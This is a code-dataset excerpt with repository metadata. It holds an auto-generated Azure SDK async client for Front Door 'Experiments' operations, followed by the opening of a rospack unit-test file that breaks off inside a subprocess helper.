cb0e122b4c0e9234e1f0f0e11d6affdfaed10c6a | aa0270b351402e421631ebc8b51e528448302fab | /sdk/network/azure-mgmt-frontdoor/azure/mgmt/frontdoor/aio/operations/_experiments_operations.py | 3447700b37de7b3edc5130e30a769d21572d3f89 | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | fangchen0601/azure-sdk-for-python | d04a22109d0ff8ff209c82e4154b7169b6cb2e53 | c2e11d6682e368b2f062e714490d2de42e1fed36 | refs/heads/master | 2023-05-11T16:53:26.317418 | 2023-05-04T20:02:16 | 2023-05-04T20:02:16 | 300,440,803 | 0 | 0 | MIT | 2020-10-16T18:45:29 | 2020-10-01T22:27:56 | null | UTF-8 | Python | false | false | 38,260 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, AsyncIterable, Callable, Dict, IO, Optional, TypeVar, Union, cast, overload
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._experiments_operations import (
build_create_or_update_request,
build_delete_request,
build_get_request,
build_list_by_profile_request,
build_update_request,
)
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ExperimentsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.frontdoor.aio.FrontDoorManagementClient`'s
:attr:`experiments` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list_by_profile(
self, resource_group_name: str, profile_name: str, **kwargs: Any
) -> AsyncIterable["_models.Experiment"]:
"""Gets a list of Experiments.
Gets a list of Experiments.
:param resource_group_name: Name of the Resource group within the Azure subscription. Required.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
:type profile_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either Experiment or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.frontdoor.models.Experiment]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
cls: ClsType[_models.ExperimentList] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_profile_request(
resource_group_name=resource_group_name,
profile_name=profile_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_by_profile.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = HttpRequest("GET", next_link)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ExperimentList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
list_by_profile.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments"
}
@distributed_trace_async
async def get(
self, resource_group_name: str, profile_name: str, experiment_name: str, **kwargs: Any
) -> _models.Experiment:
"""Gets an Experiment by ExperimentName.
Gets an Experiment by ExperimentName.
:param resource_group_name: Name of the Resource group within the Azure subscription. Required.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the Experiment. Required.
:type experiment_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Experiment or the result of cls(response)
:rtype: ~azure.mgmt.frontdoor.models.Experiment
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
cls: ClsType[_models.Experiment] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
profile_name=profile_name,
experiment_name=experiment_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("Experiment", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}"
}
async def _create_or_update_initial(
self,
resource_group_name: str,
profile_name: str,
experiment_name: str,
parameters: Union[_models.Experiment, IO],
**kwargs: Any
) -> _models.Experiment:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Experiment] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "Experiment")
request = build_create_or_update_request(
resource_group_name=resource_group_name,
profile_name=profile_name,
experiment_name=experiment_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._create_or_update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("Experiment", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("Experiment", pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize("Experiment", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_create_or_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}"
}
@overload
async def begin_create_or_update(
self,
resource_group_name: str,
profile_name: str,
experiment_name: str,
parameters: _models.Experiment,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.Experiment]:
"""Creates or updates an Experiment.
Creates or updates an Experiment.
:param resource_group_name: Name of the Resource group within the Azure subscription. Required.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the Experiment. Required.
:type experiment_name: str
:param parameters: The Experiment resource. Required.
:type parameters: ~azure.mgmt.frontdoor.models.Experiment
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Experiment or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.frontdoor.models.Experiment]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_create_or_update(
self,
resource_group_name: str,
profile_name: str,
experiment_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.Experiment]:
"""Creates or updates an Experiment.
Creates or updates an Experiment.
:param resource_group_name: Name of the Resource group within the Azure subscription. Required.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the Experiment. Required.
:type experiment_name: str
:param parameters: The Experiment resource. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Experiment or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.frontdoor.models.Experiment]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
profile_name: str,
experiment_name: str,
parameters: Union[_models.Experiment, IO],
**kwargs: Any
) -> AsyncLROPoller[_models.Experiment]:
"""Creates or updates an Experiment.
Creates or updates an Experiment.
:param resource_group_name: Name of the Resource group within the Azure subscription. Required.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the Experiment. Required.
:type experiment_name: str
:param parameters: The Experiment resource. Is either a model type or a IO type. Required.
:type parameters: ~azure.mgmt.frontdoor.models.Experiment or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Experiment or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.frontdoor.models.Experiment]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Experiment] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
profile_name=profile_name,
experiment_name=experiment_name,
parameters=parameters,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("Experiment", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create_or_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}"
}
async def _update_initial(
self,
resource_group_name: str,
profile_name: str,
experiment_name: str,
parameters: Union[_models.ExperimentUpdateModel, IO],
**kwargs: Any
) -> _models.Experiment:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Experiment] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "ExperimentUpdateModel")
request = build_update_request(
resource_group_name=resource_group_name,
profile_name=profile_name,
experiment_name=experiment_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("Experiment", pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize("Experiment", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}"
}
@overload
async def begin_update(
self,
resource_group_name: str,
profile_name: str,
experiment_name: str,
parameters: _models.ExperimentUpdateModel,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.Experiment]:
"""Updates an Experiment by Experiment id.
Updates an Experiment.
:param resource_group_name: Name of the Resource group within the Azure subscription. Required.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the Experiment. Required.
:type experiment_name: str
:param parameters: The Experiment Update Model. Required.
:type parameters: ~azure.mgmt.frontdoor.models.ExperimentUpdateModel
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Experiment or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.frontdoor.models.Experiment]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_update(
self,
resource_group_name: str,
profile_name: str,
experiment_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.Experiment]:
"""Updates an Experiment by Experiment id.
Updates an Experiment.
:param resource_group_name: Name of the Resource group within the Azure subscription. Required.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the Experiment. Required.
:type experiment_name: str
:param parameters: The Experiment Update Model. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Experiment or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.frontdoor.models.Experiment]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_update(
self,
resource_group_name: str,
profile_name: str,
experiment_name: str,
parameters: Union[_models.ExperimentUpdateModel, IO],
**kwargs: Any
) -> AsyncLROPoller[_models.Experiment]:
"""Updates an Experiment by Experiment id.
Updates an Experiment.
:param resource_group_name: Name of the Resource group within the Azure subscription. Required.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the Experiment. Required.
:type experiment_name: str
:param parameters: The Experiment Update Model. Is either a model type or a IO type. Required.
:type parameters: ~azure.mgmt.frontdoor.models.ExperimentUpdateModel or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Experiment or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.frontdoor.models.Experiment]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.Experiment] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
profile_name=profile_name,
experiment_name=experiment_name,
parameters=parameters,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("Experiment", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}"
}
async def _delete_initial( # pylint: disable=inconsistent-return-statements
self, resource_group_name: str, profile_name: str, experiment_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_request(
resource_group_name=resource_group_name,
profile_name=profile_name,
experiment_name=experiment_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}"
}
@distributed_trace_async
async def begin_delete(
self, resource_group_name: str, profile_name: str, experiment_name: str, **kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes an Experiment.
Deletes an Experiment.
:param resource_group_name: Name of the Resource group within the Azure subscription. Required.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant and Partner. Required.
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the Experiment. Required.
:type experiment_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-11-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-11-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
profile_name=profile_name,
experiment_name=experiment_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}"
}
| [
"[email protected]"
] | |
f085ce927f914d7feac5640390c519859f1df241 | 53e3e676b66e4ed6bbf7941c7e78c2820fcbed59 | /build_isolated/rospack/test/test/utest.py | c5cf969afefe057c5a2c2fca0f9db7480002ba66 | [] | no_license | daichi08/catkin_ws_atPi | 0bdc3e5f2c7073d888a2f6109c0842521c99104e | 9690697e1d432f06c5ee4570a0e7d1a2cc7c44ed | refs/heads/master | 2020-03-22T21:09:04.291933 | 2018-08-02T06:10:41 | 2018-08-02T06:10:41 | 140,661,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38,742 | py | # Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Brian Gerkey/Ken Conley
import os
import unittest
import tempfile
import shutil
import sys
import platform
from subprocess import Popen, PIPE
ROS_PACKAGE_PATH = 'ROS_PACKAGE_PATH'
ROS_LANG_DISABLE = 'ROS_LANG_DISABLE'
ROSPACK_PATH = "/home/pi/catkin_ws/devel_isolated/rospack/bin/rospack"
# Set the initial CWD, so that we can set it back later.
# Go up one directory. Have to do this because nosetests doesn't seem to
# run properly from the parent directory, even with --where= passed in.
initial_cwd = os.path.dirname(os.path.dirname(__file__))
os.chdir(initial_cwd)
_structure_test_p = os.path.abspath('structure_test')
# expected layout of the structure_test directory, used for rospack find and list tests
structure_test = {
'package1': 'package1',
'package2': 'package2',
'package3': 'subdir1/package3',
'package4': 'subdir1/subdir1_1/package4',
'package5': 'subdir1/subdir1_1/package5',
'package6': 'subdir3/package6',
'package7': 'subdir3/package7',
}
# canonicalize
for k in structure_test.keys():
structure_test[k] = os.path.abspath(os.path.join(_structure_test_p, structure_test[k]))
aliases = {
'deps': 'depends',
'deps1': 'depends1',
'deps-manifests': 'depends-manifests',
'deps-indent': 'depends-indent',
'rosdep': 'rosdeps',
'rosdep0': 'rosdeps0'
}
## Process-level tests of rospack executable
class RospackTestCase(unittest.TestCase):
def setUp(self):
# Some tests change CWD
os.chdir(initial_cwd)
## runs rospack with ROS_PACKAGE_PATH set to ./test
## @return int, str: return code, stdout
def _run_rospack(self, ros_package_path, pkgname, command):
env = os.environ.copy()
if ros_package_path is not None:
env[ROS_PACKAGE_PATH] = ros_package_path
elif ROS_PACKAGE_PATH in env:
